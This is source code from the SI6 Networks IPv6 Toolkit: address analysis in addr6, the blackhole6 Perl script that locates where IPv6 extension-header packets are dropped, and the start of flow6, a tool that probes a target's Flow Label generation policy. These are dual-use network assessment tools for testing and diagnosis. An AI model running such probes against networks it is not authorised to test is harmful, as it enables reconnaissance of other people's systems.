*iidembeddedport="embedded-port"; char *iidembeddedportrev="embedded-port-rev"; char *iidlowbyte="low-byte"; char *iidembeddedipv4_32="embedded-ipv4-32"; char *iidembeddedipv4_64="embedded-ipv4-64"; char *iidpatternbytes="pattern-bytes"; char *iidrandom="randomized"; char *iidteredorfc4380="rfc4380"; char *iidteredorfc5991="rfc5991"; char *iidteredounknown="unknown"; char *scopereserved="reserved"; char *scopeinterface="interface"; char *scopelink="link"; char *scopeadmin="admin"; char *scopesite="site"; char *scopeorganization="organization"; char *scopeglobal="global"; char *scopeunassigned="unassigned"; char *scopeunspecified="unspecified"; char *type, *subtype, *scope, *iidtype, *iidsubtype; type= nullstring; subtype= nullstring; iidtype= nullstring; iidsubtype= nullstring; switch(addr->type){ case IPV6_UNSPEC: type= ipv6unspec; subtype= unspecified; iidtype= unspecified; iidsubtype=unspecified; break; case IPV6_UNICAST: type= ipv6unicast; iidtype= unspecified; iidsubtype=unspecified; switch(addr->subtype){ case UCAST_LOOPBACK: subtype= ucastloopback; iidtype= iidlowbyte; break; case UCAST_GLOBAL: subtype= ucastglobal; break; case UCAST_V4MAPPED: subtype= ucastv4mapped; break; case UCAST_V4COMPAT: subtype= ucastv4compat; break; case UCAST_LINKLOCAL: subtype= ucastlinklocal; break; case UCAST_SITELOCAL: subtype= ucastsitelocal; break; case UCAST_UNIQUELOCAL: subtype= ucastuniquelocal; break; case UCAST_6TO4: subtype= ucast6to4; break; case UCAST_TEREDO: subtype= ucastteredo; break; } if(addr->subtype == UCAST_GLOBAL || addr->subtype == UCAST_V4MAPPED || addr->subtype == UCAST_V4COMPAT || \ addr->subtype == UCAST_LINKLOCAL || addr->subtype == UCAST_SITELOCAL || addr->subtype == UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4 || addr->subtype == UCAST_TEREDO){ switch(addr->iidtype){ case IID_MACDERIVED: iidtype= iidmacderived; iidsubtype= iidsubtypebuffer; r=snprintf(iidsubtypebuffer, sizeof(iidsubtypebuffer), "%02x-%02x-%02x", (addr->iidsubtype >> 16 & 0xff), (addr->iidsubtype >> 8 & 0xff), (addr->iidsubtype & 0xff)); if(r == 8) iidsubtype= iidsubtypebuffer; break; case IID_ISATAP: iidtype= iidisatap; break; case IID_EMBEDDEDIPV4: iidtype= iidmbeddedipv4; switch(addr->iidsubtype){ case IID_EMBEDDEDIPV4_32: iidsubtype= iidembeddedipv4_32; break; case IID_EMBEDDEDIPV4_64: iidsubtype= iidembeddedipv4_64; break; } break; case IID_EMBEDDEDPORT: iidtype= iidembeddedport; break; case IID_EMBEDDEDPORTREV: iidtype= iidembeddedportrev; break; case IID_LOWBYTE: iidtype= iidlowbyte; break; case IID_EMBEDDEDIPV4_64: iidtype= iidembeddedipv4_64; break; case IID_PATTERN_BYTES: iidtype= iidpatternbytes; break; case IID_RANDOM: iidtype= iidrandom; break; case IID_TEREDO_RFC4380: iidtype= iidteredorfc4380; break; case IID_TEREDO_RFC5991: iidtype= iidteredorfc5991; break; case IID_TEREDO_UNKNOWN: iidtype= iidteredounknown; break; } } break; case IPV6_MULTICAST: type= ipv6multicast; iidtype= unspecified; iidsubtype= unspecified; switch(addr->subtype){ case MCAST_PERMANENT: subtype= mcastpermanent; break; case MCAST_NONPERMANENT: subtype= mcastnonpermanent; break; case MCAST_INVALID: subtype= mcastinvalid; break; case MCAST_UNICASTBASED: subtype= mcastunicastbased; break; case MCAST_EMBEDRP: subtype= mcastembedrp; break; case MCAST_UNKNOWN: subtype= mcastunknown; break; } } switch(addr->scope){ case SCOPE_RESERVED: scope= scopereserved; break; case SCOPE_INTERFACE: scope= scopeinterface; break; case SCOPE_LINK: scope= scopelink; break; case SCOPE_ADMIN: scope= scopeadmin; break; case SCOPE_SITE: scope= scopesite; break; case SCOPE_ORGANIZATION: scope= scopeorganization; break; case SCOPE_GLOBAL: scope= scopeglobal; break; case SCOPE_UNSPECIFIED: scope= scopeunspecified; break; default: scope= scopeunassigned; break; } printf("%s=%s=%s=%s=%s\n", type, subtype, scope, iidtype, iidsubtype); } /* * Function: usage() * * Prints the syntax of the addr6 tool */ void usage(void){ puts("usage: addr6 (-i | -a) [-c | -d | -r | -s | -q] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the scan6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "addr6: An IPv6 address analysis and conversion tool\n"); usage(); puts("\nOPTIONS:\n" " --address, -a IPv6 address to be decoded\n" " --stdin, -i Read IPv6 addresses from stdin (standard input)\n" " --print-canonic, -c Print IPv6 addresses in canonic form\n" " --print-reverse, -r Print reversed IPv6 address\n" " --print-decode, -d Decode IPv6 addresses\n" " --print-stats, -s Print statistics about IPv6 addresses\n" " --print-unique, -q Discard duplicate IPv6 addresses\n" " --accept, -j Accept IPv6 addresses from specified IPv6 prefix\n" " --accept-type, -b Accept IPv6 addresses of specified type\n" " --accept-scope, -k Accept IPv6 addresses of specified scope\n" " --accept-utype, -w Accept IPv6 unicast addresses of specified type\n" " --accept-iid, -g Accept IPv6 addresses with IIDs of specified type\n" " --block, -J Block IPv6 addresses from specified IPv6 prefix\n" " --block-type, -B Block IPv6 addresses of specified type\n" " --block-scope, -K Block IPv6 addresses of specified scope\n" " --block-utype, -W Block IPv6 unicast addresses of specified type\n" " --block-iid, -G Block IPv6 addresses with IIDs of specified type\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the addr6 tool\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: init_host_list() * * Initilizes a host_list structure */ int init_host_list(struct hashed_host_list *hlist){ unsigned int i; memset(hlist, 0, sizeof(struct hashed_host_list)); if( (hlist->host = malloc(MAX_LIST_ENTRIES * sizeof(struct hashed_host_entry *))) == NULL){ return(0); } for(i=0; i < MAX_LIST_ENTRIES; i++) hlist->host[i]= NULL; hlist->nhosts= 0; hlist->maxhosts= MAX_HOST_ENTRIES; hlist->key_l= rand(); hlist->key_h= rand(); return(1); } /* * Function: key() * * Compute a key for accessing the hash-table of a hashed_host_list structure */ uint16_t key(struct hashed_host_list *hlist, struct in6_addr *ipv6){ return( ((hlist->key_l ^ (uint16_t)(ntohl(ipv6->s6_addr32[0]) >> 16) ^ (uint16_t)(ntohl(ipv6->s6_addr32[3]) & 0x0000ffff)) \ ^ (hlist->key_h ^ (uint16_t)(ntohl(ipv6->s6_addr32[0]) >> 16) ^ (uint16_t)(ipv6->s6_addr32[3] >> 16))) % MAX_LIST_ENTRIES); } /* * Function: add_hashed_host_entry() * * Add a hashed_host_entry structure to the hash table */ struct hashed_host_entry *add_hashed_host_entry(struct hashed_host_list *hlist, struct in6_addr *ipv6){ struct hashed_host_entry *hentry, *ptr; uint16_t hkey; hkey= key(hlist, ipv6); if(hlist->nhosts >= hlist->maxhosts){ return(NULL); } if( (hentry= malloc(sizeof(struct hashed_host_entry))) == NULL){ return(NULL); } memset(hentry, 0, sizeof(struct hashed_host_entry)); hentry->ip6 = *ipv6; hentry->next= NULL; if(hlist->host[hkey] == NULL){ /* First node in chain */ hlist->host[hkey]= hentry; hentry->prev= NULL; } else{ /* Find last node in list */ for(ptr=hlist->host[hkey]; ptr->next != NULL; ptr= ptr->next); hentry->prev= ptr; ptr->next= hentry; } (hlist->nhosts)++; return(hentry); } /* * Function: is_ip6_in_hashed_list() * * Checks whether an IPv6 address is present in a host list. */ unsigned int is_ip6_in_hashed_list(struct hashed_host_list *hlist, struct in6_addr *target){ uint16_t ckey; struct hashed_host_entry *chentry; ckey= key(hlist, target); for(chentry= hlist->host[ckey]; chentry != NULL; chentry=chentry->next) if( is_eq_in6_addr(target, &(chentry->ip6)) ) return 1; return 0; } /* * Function: print_stats() * * Prints IPv6 address statistics */ void print_stats(struct stats6 *stats){ unsigned int totaliids=0; puts("\n** IPv6 General Address Analysis **\n"); printf("Total IPv6 addresses: %u\n", stats->total); printf("Unicast: %7u (%.2f%%)\t\tMulticast: %7u (%.2f%%)\n", stats->ipv6unicast, \ ((float)(stats->ipv6unicast)/stats->total) * 100, stats->ipv6multicast, ((float)(stats->ipv6multicast)/stats->total) * 100); printf("Unspec.: %7u (%.2f%%)\n\n", stats->ipv6unspecified, ((float)(stats->ipv6unspecified)/stats->total) * 100); if(stats->ipv6unicast){ puts("** IPv6 Unicast Addresses **\n"); printf("Loopback: %7u (%.2f%%)\t\tIPv4-mapped: %7u (%.2f%%)\n",\ stats->ucastloopback, ((float)(stats->ucastloopback)/stats->ipv6unicast) * 100, stats->ucastv4mapped, \ ((float)(stats->ucastv4mapped)/stats->ipv6unicast) * 100); printf("IPv4-compat.: %7u (%.2f%%)\t\tLink-local: %7u (%.2f%%)\n", stats->ucastv4compat, \ ((float)(stats->ucastv4compat)/stats->ipv6unicast) * 100, stats->ucastlinklocal, \ ((float)(stats->ucastlinklocal)/stats->ipv6unicast) * 100); printf("Site-local: %7u (%.2f%%)\t\tUnique-local: %7u (%.2f%%)\n", stats->ucastsitelocal, \ ((float)(stats->ucastsitelocal)/stats->ipv6unicast) * 100, stats->ucastuniquelocal, \ ((float)(stats->ucastuniquelocal)/stats->ipv6unicast) * 100); printf("6to4: %7u (%.2f%%)\t\tTeredo: %7u (%.2f%%)\n", stats->ucast6to4, \ ((float)(stats->ucast6to4)/stats->ipv6unicast) * 100, stats->ucastteredo, \ ((float)(stats->ucastteredo)/stats->ipv6unicast) * 100); printf("Global: %7u (%.2f%%)\n\n", stats->ucastglobal, ((float)(stats->ucastglobal)/stats->ipv6unicast) * 100); } if(stats->ipv6multicast){ puts("** IPv6 Multicast Addresses **\n"); puts("+ Multicast Address Types +"); printf("Permanent: %7u (%.2f%%)\t\tNon-permanent %7u (%.2f%%)\n",\ stats->mcastpermanent, ((float)(stats->mcastpermanent)/stats->ipv6multicast) * 100, stats->mcastnonpermanent, \ ((float)(stats->mcastnonpermanent)/stats->ipv6multicast) * 100); printf("Invalid: %7u (%.2f%%)\t\tUnicast-based: %7u (%.2f%%)\n", stats->mcastinvalid, \ ((float)(stats->mcastinvalid)/stats->ipv6multicast) * 100, stats->mcastunicastbased, \ ((float)(stats->mcastunicastbased)/stats->ipv6multicast) * 100); printf("Embedded-RP: %7u (%.2f%%)\t\tUnknown: %7u (%.2f%%)\n\n", stats->mcastembedrp, \ ((float)(stats->mcastembedrp)/stats->ipv6multicast) * 100, stats->mcastunknown, \ ((float)(stats->mcastunknown)/stats->ipv6multicast) * 100); puts("+ Multicast Address Scopes +"); printf("Reserved: %7u (%.2f%%)\t\tInterface: %7u (%.2f%%)\n",\ stats->mscopereserved, ((float)(stats->mscopereserved)/stats->ipv6multicast) * 100, stats->mscopeinterface, \ ((float)(stats->mscopeinterface)/stats->ipv6multicast) * 100); printf("Link: %7u (%.2f%%)\t\tAdmin: %7u (%.2f%%)\n", stats->mnscopelink, \ ((float)(stats->mnscopelink)/stats->ipv6multicast) * 100, stats->mscopeadmin, \ ((float)(stats->mscopeadmin)/stats->ipv6multicast) * 100); printf("Site: %7u (%.2f%%)\t\tOrganization: %7u (%.2f%%)\n", stats->mscopesite, \ ((float)(stats->mscopesite)/stats->ipv6multicast) * 100, stats->mscopeorganization, \ ((float)(stats->mscopeorganization)/stats->ipv6multicast) * 100); printf("Global: %7u (%.2f%%)\t\tUnassigned: %7u (%.2f%%)\n\n", stats->mscopeadmin, \ ((float)(stats->mscopeadmin)/stats->ipv6multicast) * 100, stats->mscopesite, \ ((float)(stats->mscopesite)/stats->ipv6multicast) * 100); } totaliids= stats->ucastglobal + stats->ucastlinklocal + stats->ucastsitelocal + stats->ucastuniquelocal + \ stats->ucast6to4; if(totaliids){ puts("** IPv6 Interface IDs **\n"); printf("Total IIDs analyzed: %u\n", totaliids); printf("IEEE-based: %7u (%.2f%%)\t\tLow-byte: %7u (%.2f%%)\n",\ stats->iidmacderived, ((float)(stats->iidmacderived)/totaliids) * 100, stats->iidlowbyte, ((float)(stats->iidlowbyte)/totaliids) * 100); printf("Embed-IPv4: %7u (%.2f%%)\t\tEmbed-IPv4 (64): %7u (%.2f%%)\n", stats->iidmbeddedipv4, \ ((float)(stats->iidmbeddedipv4)/totaliids) * 100, stats->iidembeddedipv4_64, \ ((float)(stats->iidembeddedipv4_64)/totaliids) * 100); printf("Embed-port: %7u (%.2f%%)\t\tEmbed-port (r): %7u (%.2f%%)\n", stats->iidembeddedport, \ ((float)(stats->iidembeddedport)/totaliids) * 100, stats->iidembeddedportrev, \ ((float)(stats->iidembeddedportrev)/totaliids) * 100); printf("ISATAP: %7u (%.2f%%)\t\tByte-pattern: %7u (%.2f%%)\n", stats->iidisatap, \ ((float)(stats->iidisatap)/totaliids) * 100, stats->iidpatternbytes, \ ((float)(stats->iidpatternbytes)/totaliids) * 100); printf("Randomized: %7u (%.2f%%)\n\n", stats->iidrandom, ((float)(stats->iidrandom)/totaliids) * 100); } } ipv6toolkit-2.0+ds.1/tools/addr6.h000066400000000000000000000034641254360455000167320ustar00rootroot00000000000000 #define MAX_LINE_SIZE 250 #define MAX_TYPE_SIZE 25 #define MAX_LIST_ENTRIES 65535 #define MAX_HOST_ENTRIES 4000000 /* Filter Constants */ #define MAX_BLOCK 50 #define MAX_ACCEPT 50 struct hashed_host_entry{ struct in6_addr ip6; struct hashed_host_entry *next; struct hashed_host_entry *prev; }; struct hashed_host_list{ struct hashed_host_entry **host; /* Double-linked list of host entries */ unsigned int nhosts; /* Current number of host entries */ unsigned int maxhosts; /* Maximum number of host entries */ uint16_t key_l; /* Low-order word of the hash key */ uint16_t key_h; /* High-order word of the hash key */ }; struct stats6{ unsigned int total; unsigned int ipv6unspecified; unsigned int ipv6multicast; unsigned int ipv6unicast; unsigned int ucastloopback; unsigned int ucastv4mapped; unsigned int ucastv4compat; unsigned int ucastlinklocal; unsigned int ucastsitelocal; unsigned int ucastuniquelocal; unsigned int ucast6to4; unsigned int ucastteredo; unsigned int ucastglobal; unsigned int mcastpermanent; unsigned int mcastnonpermanent; unsigned int mcastinvalid; unsigned int mcastunicastbased; unsigned int mcastembedrp; unsigned int mcastunknown; unsigned int iidmacderived; unsigned int iidisatap; unsigned int iidmbeddedipv4; /* This one is currently unused */ unsigned int iidembeddedipv4_32; unsigned int iidembeddedipv4_64; unsigned int iidembeddedport; unsigned int iidembeddedportrev; unsigned int iidlowbyte; unsigned int iidpatternbytes; unsigned int iidrandom; unsigned int mscopereserved; unsigned int mscopeinterface; unsigned int mnscopelink; unsigned int mscopeadmin; unsigned int mscopesite; unsigned int mscopeorganization; unsigned int mscopeglobal; unsigned int mscopeunassigned; unsigned int mscopeunspecified; }; ipv6toolkit-2.0+ds.1/tools/blackhole6000077500000000000000000000162771254360455000175270ustar00rootroot00000000000000#!/usr/bin/perl # # blackhole6: A tool to make complex IPv6 tasks easy # # Syntax: blackhole6 DESTINATION [HEADERSIZE [PROTOCOL [PORT]]] use Socket(); $total=0; $response=0; $timeout=0; sub usage{ print "usage: blackhole6 DESTINATION [EHTYPE[EHSIZE]] [PROTOCOL [PORT]]]\n"; } # Function GetASN() # # Obtains the autonomous system number (ASN) for a given IPv6 address # sub GetASN{ @revname=`addr6 -a $_[0] -r`; if( ($? >> 8) != 0){ return(-1); } else{ chomp($revname[0]); $queryname= $revname[0] . ".origin6.asn.cymru.com."; @reverse=`host -t TXT $queryname`; if($reverse[0] =~ m/\"\s*((\d+)\s*)\s+|"/){ return($2); } else{ return(-1); } } } # Function GetORG() # # Obtains the organization corresponding to an autonomous system number (ASN) # sub GetORG{ $querystring="host -t TXT AS".$_[0].".asn.cymru.com"; @asinfo= `$querystring`; if($asinfo[0] =~ m/\"*.\|.*\|.*\|.*\|\s*(.*)\"/){ return($1); } else{ return(-1); } } # Remove all items from the array of IP addresses undef @ipsfree; print "SI6 Networks IPv6 Toolkit v2.0 (Guille)\n"; print "blackhole6: A tool to find IPv6 blackholes\n"; if($> != 0){ print "Error: blackhole6 requires superuser privileges\n"; exit 1; } if($#ARGV < 0){ print "Error: Must specify an IPv6 address\n"; usage(); exit 1; } # Obtain the IPv6 addres corresponding to the specified domain name # (This implicitly obtains the canonic address if an IPv6 address was specified) my ( $err, @addrs ) = Socket::getaddrinfo( $ARGV[0], 0, { 'protocol' => Socket::IPPROTO_TCP, 'family' => Socket::AF_INET6 } ); if($err){ die $err; } my ( $err, $fline ) = Socket::getnameinfo( $addrs[0]->{addr}, Socket::NI_NUMERICHOST ); if ($err){ die $err; } #$fline= Socket::inet_ntop(Socket::AF_INET6, $addrs[0]->{addr}); $ehtype= "do"; $ehsize= "8"; $prototype="icmp"; if($#ARGV > 0){ if($ARGV[1] =~ m/([a-zA-Z]+):?(\d+)/){ $ehtype= lc($1); $ehsize= $2; } else{ $ehtype= $ARGV[1]; } if($#ARGV > 1){ $prototype= $ARGV[2]; if($#ARGV > 2){ $port= $ARGV[3]; } else{ $port= "80"; } } } if($prototype eq "tcp"){ $protoopt= "--tcp-flags S -a $port"; } else{ $protoopt=""; } if($ehtype eq "fh" || $ehtype eq "frag"){ if($ehsize < 8){ print "Error: Fragment size should be larger than or equal to 8 bytes"; exit 1; } elsif($ehsize > 1280){ print "Error: Fragment size should be smaller than or equal to 1280 bytes"; exit 1; } $payload= ($ehsize * 2) - 20; $protoopt="-P $payload " . $protoopt; } if($ehtype eq "fh" || $ehtype eq "frag"){ $eh= "-y $ehsize"; } elsif($ehtype eq "hbh"){ $eh= "-H $ehsize"; } elsif($ehtype eq "do"){ $eh= "-u $ehsize"; } elsif($ehtype eq "esp"){ $eh= "-p esp"; } elsif($ehtype eq "ah"){ $eh= "-p ah"; } else{ print "Error: Unknown EH type"; exit 1; } print "Tracing $ARGV[0] ($fline)...\n"; $maxhopsfree=0; $maxhopsfreeip=""; @tcp=`path6 -d $fline -p $prototype $protoopt --rate-limit 40pps`; if(($? >> 8) != 0){ print "blackhole6: Found issues when running path6 to the specified target"; exit(1); } foreach $line (@tcp){ # Discard lines that do not contain a "probe" line if($line =~ m/\s+(\d+)\s+\((\S*)\)/){ if($1 > $maxhopsfree){ if($2 ne ""){ $maxhopsfree=$1; $maxhopsfreeip=$2; } # We store the IPv6 addresses of all hops push(@ipsfree, $2); } } } $maxhopstrouble=0; $maxhopstroubleip=""; # XXX: This is an ugly hack. should be removed. ESP and AH should possibly be handled as EHs, rather than probe types if($ehtype eq "esp" || $ehtype eq "ah"){ @tcp=`path6 -d $fline $eh --rate-limit 40pps`; }else{ @tcp=`path6 -d $fline -p $prototype $protoopt $eh --rate-limit 40pps`; } if(($? >> 8) != 0){ print "blackhole6: Found issues when running path6 to the specified target\n"; exit(1); } foreach $line (@tcp){ # Discard lines that do not contain a "probe" line if($line =~ m/\s+(\d+)\s+\((\S*)\)/){ if($1 > $maxhopstrouble){ if($2 ne ""){ $maxhopstrouble=$1; $maxhopstroubleip= $2; } } } } $dropip=""; $dropip2=""; for($i=0; $i< $#ipsfree; $i++){ if($ipsfree[$i] eq $maxhopstroubleip){ $dropip= $ipsfree[$i+1]; $dropip2= $ipsfree[$i+2]; last; } } $flineasn= GetASN($fline); # fline holds the destination system if($flineasn == -1){ # print "blackhole6: Error when trying to obtain ASN for $fline\n"; # exit(1); $flineasn= " Unknown"; } elsif($flineasn eq ""){ $flineasn= " Unknown"; } $maxhopsfreeasn= GetASN($maxhopsfreeip); if($maxhopsfreeasn == -1){ # print "blackhole6: Error when trying to obtain ASN for $maxhopsfreeip\n"; # exit(1); $maxhopsfreeasn= " Unknown"; } elsif($maxhopsfreeasn eq ""){ $maxhopsfreeasn= " Unknown"; } $maxhopstroubleasn= GetASN($maxhopstroubleip); if($maxhopstroubleasn == -1){ # print "blackhole6: Error when trying to obtain ASN for $maxhopstroubleip\n"; # exit(1); $maxhopstroubleasn= " Unknown"; } elsif($maxhopstroubleasn eq ""){ $maxhopstroubleasn= " Unknown"; } $ehtype_uc= uc($ehtype); $flineorg= GetORG($flineasn); if($flineorg == -1){ # print "blackhole6: Error when trying to obtain organization for AS$flineasn\n"; # exit(1); $flineorg= "Unknown organization"; } $maxhopsfreeorg= GetORG($maxhopsfreeasn); if($maxhopsfreeorg == -1){ # print "blackhole6: Error when trying to obtain organization for AS$maxhopsfreeasn\n"; # exit(1); $maxhopsfreeorg= "Unknown organization"; } $maxhopstroubleorg= GetORG($maxhopstroubleasn); if($maxhopstroubleorg == -1){ # print "blackhole6: Error when trying to obtain organization for AS$maxhopstroubleasn\n"; # exit(1); $maxhopstroubleorg= "Unknown organization"; } print "\nDst. IPv6 address: $fline (AS$flineasn - $flineorg)\n"; print "Last node (no EHs): $maxhopsfreeip (AS$maxhopsfreeasn - $maxhopsfreeorg) ($maxhopsfree hop(s))\n"; print "Last node ($ehtype_uc $ehsize): $maxhopstroubleip (AS$maxhopstroubleasn - $maxhopstroubleorg) ($maxhopstrouble hop(s))\n"; if($maxhopsfreeip eq $fline){ if($maxhopstroubleip eq $fline){ print "Dropping node: No packet drops\n"; } else{ $dropasn= GetASN($dropip); if($dropasn == -1){ # print "blackhole6: Error when trying to obtain ASN for $dropip\n"; # exit(1); $dropasn=""; } $droporg= ""; if($dropasn ne ""){ $droporg= GetORG($dropasn); if($droporg == -1){ # print "blackhole6: Error when trying to obtain organization for AS$dropasn\n"; # exit(1); $droporg= ""; } } if($dropasn eq ""){ $dropasn= " Unknown"; } if($droporg eq ""){ $droporg= "Unknown"; } if($dropip2 ne ""){ $dropasn2= GetASN($dropip2); if($dropasn2 == -1){ # print "blackhole6: Error when trying to obtain ASN for $dropip2\n"; # exit(1); $dropasn2=""; } $droporg2= ""; if($dropasn2 ne ""){ $droporg2= GetORG($dropasn2); if($droporg2 == -1){ # print "blackhole6: Error when trying to obtain organization for AS$dropasn2\n"; # exit(1); $droporg2=""; } } if($dropasn2 eq ""){ $dropasn2= " Unknown"; } if($droporg2 eq ""){ $droporg2= "Unknown"; } } if( ($dropip2 eq "") || ($dropasn1 eq $dropasn2)){ print "Dropping node: $dropip (AS$dropasn - $droporg)\n"; } else{ print "Dropping node: $dropip (AS$dropasn - $droporg || AS$dropasn2 - $droporg2)\n"; } } } else{ print "Dropping nodes: Packets being dropped for both the no-EH and the EH case\n"; } ipv6toolkit-2.0+ds.1/tools/flow6.c000066400000000000000000000601251254360455000167570ustar00rootroot00000000000000/* * flow6: A security assessment tool that determines the Flow Label * generation policy of a target node * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks (www.si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warrsi6networks.allanty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make flow6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "flow6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void print_attack_info(void); void usage(void); void print_help(void); int send_fid_probe(void); int predict_flow_id(uint32_t *, unsigned int, uint32_t *, unsigned int); /* Used for router discovery */ struct iface_data idata; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end, *pkt_ptr; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; struct udp_hdr *pkt_udp; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; char iface[IFACE_LENGTH]; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int frags, nfrags, nsleep; unsigned char srcpreflen; uint16_t mask, ip6length; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char localaddr_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, flowidp_f=0, dstport_f=0, protocol_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char *fragpart, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* For the sampling of Flow Label values */ uint16_t baseport, lastport, dstport, tcpwin, addr_sig, addr_key; uint32_t tcpseq; uint8_t protocol; int main(int argc, char **argv){ extern char *optarg; fd_set sset, rset; struct timeval timeout; int r, sel; time_t curtime, start, lastfrag1=0; struct target_ipv6 targetipv6; /* Arrays for storing the Flow ID samples */ uint32_t test1[NSAMPLES], test2[NSAMPLES]; unsigned int ntest1=0, ntest2=0; unsigned char testtype; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"protocol", required_argument, 0, 'P'}, {"dst-port", no_argument, 0, 'p'}, {"flow-label-policy", no_argument, 0, 'W'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:S:D:P:p:Wvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ srcpreflen = atoi(charptr); if(srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), srcpreflen); srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Protocol */ if(strncmp(optarg, "tcp", MAX_STRING_SIZE) == 0 || \ strncmp(optarg, "TCP", MAX_STRING_SIZE) == 0){ protocol= IPPROTO_TCP; } else if(strncmp(optarg, "udp", MAX_STRING_SIZE) == 0 || \ strncmp(optarg, "UDP", MAX_STRING_SIZE) == 0){ protocol= IPPROTO_UDP; } else{ puts("Unknown protocol type (valid types: 'tcp', 'udp')"); exit(EXIT_FAILURE); } protocol_f= 1; break; case 'p': /* Destination port */ dstport= atoi(optarg); dstport_f=1; break; case 'W': /* Assess the Flow Label generation policy of the target */ flowidp_f= 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("flow6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); 